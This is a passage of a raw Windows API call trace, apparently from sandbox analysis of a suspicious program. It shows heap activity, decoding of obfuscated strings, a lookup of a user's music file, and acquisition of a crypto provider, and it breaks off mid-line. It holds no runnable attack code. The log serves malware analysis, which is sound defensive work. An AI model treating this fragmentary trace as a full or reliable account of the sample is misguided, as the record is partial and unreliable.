0x2aaa990 [0208.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0208.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73128 [0208.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0208.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0208.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73068 [0208.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0208.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0208.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab10 [0208.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0208.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0208.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0208.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0208.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0208.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0208.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0208.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0208.364] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\YXHKkgRMJbmq7xZC.mp3", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xda42a390, ftCreationTime.dwHighDateTime=0x1d5d4e4, ftLastAccessTime.dwLowDateTime=0x1137f5f0, ftLastAccessTime.dwHighDateTime=0x1d5ce85, ftLastWriteTime.dwLowDateTime=0x1137f5f0, ftLastWriteTime.dwHighDateTime=0x1d5ce85, nFileSizeHigh=0x0, nFileSizeLow=0xcc62, dwReserved0=0x0, dwReserved1=0x0, cFileName="YXHKkgRMJbmq7xZC.mp3", cAlternateFileName="YXHKKG~1.MP3")) returned 0x9e1cf8 [0208.364] FindClose (in: hFindFile=0x9e1cf8 | out: hFindFile=0x9e1cf8) returned 1 [0208.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0208.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0208.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0208.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0208.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0208.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0208.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0208.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0208.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0208.365] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0208.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b28 [0208.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa08 | out: hHeap=0x2af0000) returned 1 [0208.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0208.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0208.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0208.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0208.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0208.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0208.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73118 [0208.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0208.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0208.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0208.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0208.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0208.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa08 | out: hHeap=0x2af0000) returned 1 [0208.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0208.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0208.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0208.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0208.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0208.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0208.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0208.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0208.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0208.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0208.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0208.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0208.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0208.366] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.366] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0208.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0208.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0208.366] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0208.366] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0208.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0208.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0208.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0208.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0208.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0208.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0208.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0208.366] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0208.367] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.367] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0208.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0208.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0208.367] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0208.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0208.367] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0208.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0208.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0208.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0208.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0208.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa08 | out: hHeap=0x2af0000) returned 1 [0208.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0208.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0208.367] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0208.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0208.367] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0208.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0208.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0208.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0208.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0208.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0208.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0208.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0208.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0208.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0208.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0208.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0208.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0208.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f60 | out: hHeap=0x2af0000) returned 1 [0208.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0208.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0208.368] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0208.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0208.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0208.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0208.368] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0208.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0208.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0208.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa08 | out: hHeap=0x2af0000) returned 1 [0208.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0208.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0208.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0208.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0208.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0208.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0208.368] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0208.368] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.368] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0208.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0208.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0208.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0208.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0208.369] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0208.369] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0208.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0208.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0208.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0208.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0208.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0208.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0208.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0208.369] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0208.369] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0208.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0208.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0208.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0208.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0208.371] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.371] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.371] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.371] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.372] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0208.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0208.372] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.372] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0208.372] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0208.372] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0208.372] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0208.372] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0208.372] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0208.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f6ee0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0208.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0208.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f7080, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0208.372] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7ca18) returned 1 [0208.373] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.373] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.373] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0208.373] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.373] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0208.373] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.373] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.373] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.373] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.373] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.373] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.373] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0208.373] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.373] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0208.374] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.374] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.374] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.374] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.374] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.374] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.374] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.374] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0208.374] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.374] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0208.374] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.374] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.374] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.374] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.374] PeekMessageW (in: 